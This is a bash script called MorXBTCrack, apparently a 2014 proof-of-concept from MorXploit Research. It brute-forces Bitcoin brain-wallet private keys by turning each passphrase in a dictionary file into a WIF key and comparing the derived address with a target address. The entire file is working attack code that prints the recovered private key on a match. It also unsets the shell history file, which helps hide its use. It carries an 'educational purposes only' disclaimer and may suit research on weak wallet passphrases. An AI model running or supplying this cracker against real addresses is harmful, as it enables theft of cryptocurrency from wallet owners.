#!/bin/bash
#
# Tool: MorXBTCrack
# Author: Simo Ben youssef 
# Contact: <simo_at_morxploit_com>
# Coded: 1 September 2013
# Published: 28 February 2014
# MorXploit Research
# http://www.morxploit.com
#
# Description:
# Single Bitcoin private key cracking tool
# Read related paper at http://www.morxploit.com/morxpapers/smashingbitcoins.pdf
#
# Requirements:
# Linux, bash, python and keyfmt which could be downloaded from http://www.morxploit.com/morxtools/keyfmt
# Tested to work on Linux Ubuntu.
# Sorry windows kiddies, this script is not for you.
#
# Author discolaimer:
# This code and all information contained in this entire document is for educational, demonstration and testing purposes only.
# I cannot be held responsible for any malicious use. Use at your own risk.
#

banner() {
/usr/bin/clear
/bin/echo "#######################################################"
/bin/echo "##       MorXBTCrack Bitcoin take-over PoC tool      ##"
/bin/echo "##   By Simo Ben youssef <Simo_at_Morxploit_dot_com  ##"
/bin/echo "#######################################################"
/bin/echo
}

if [[ ! -f /usr/bin/morxkeyfmt ]]
then
/usr/bin/clear
banner
echo "[-] keyfmt not found, wget http://www.morxploit.com/morxtools/keyfmt"
echo
exit
fi

base58=({1..9} {A..H} {J..N} {P..Z} {a..k} {m..z})
encodeBase58() {
bc <<<"ibase=16; n=${1^^}; while(n>0) { n%3A ; n/=3A }" |
tac | while read n
do echo -n ${base58[n]}
done
}

PrivateKey() {
a=$(echo -n $1 | sha256sum)
a=$(echo $a | cut -c 1-64)
b="80$a";
c=$(echo -n $b | xxd -r -p | sha256sum -b)
c=$(echo $c | cut -c 1-64)
d=$(echo -n $c | xxd -r -p | sha256sum -b)
d=$(echo $d | cut -c 1-64)
e=$(echo $d | cut -c 1-8)
f=$b$e
enc=$(encodeBase58 $f)
}

PrivateToAddress() {
btcaddress=$(echo -n $1 | python keyfmt %a)
}

if [[ -z "$1" || -z "$2" ]]
then
banner
/bin/echo "Usage: $0 <btc address> <dictionary file>"
exit;
fi
/usr/bin/clear
banner
/bin/echo "[*] Passphrases file set to $2"
/bin/echo "[*] Bitcoin address set to $1"
/bin/echo "[*] Cracking started!"

unset HISTFILE
line=0
while read word; do
line=$(( $line + 1 ))

PrivateKey "$word"
PrivateToAddress $enc

if [[ $btcaddress == "$1" ]]
then
echo "######################################################################################"
echo "## Cracked your private key is: $enc ##"
echo "######################################################################################"
exit;
fi
echo "Trying => $line"
done < $2
echo "All done"

